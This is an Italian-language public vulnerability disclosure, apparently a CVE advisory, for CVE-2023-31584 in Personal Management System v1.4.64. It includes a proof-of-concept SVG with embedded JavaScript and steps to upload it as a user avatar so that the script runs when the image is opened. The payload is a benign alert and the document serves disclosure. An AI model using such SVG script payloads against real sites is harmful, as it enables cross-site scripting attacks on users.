
Divulgazione pubblica per CVE-2023-31584.
Una vulnerabilità di upload arbitrario di file in Personal Management System v1.4.64 consente agli attaccanti di eseguire codice arbitrario caricando un file SVG appositamente realizzato come avatar del profilo utente.
[Informazioni aggiuntive] 1.) Creare alert.svg con il seguente contenuto:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) Ospitare il .SVG su un webserver.
3.) Caricare il .SVG come immagine avatar. 4.) Quando un utente apre l'avatar in una scheda separata, il javascript memorizzato nel file .SVG viene eseguito.
Riferimenti: https://github.com/Volmarg/personal-management-system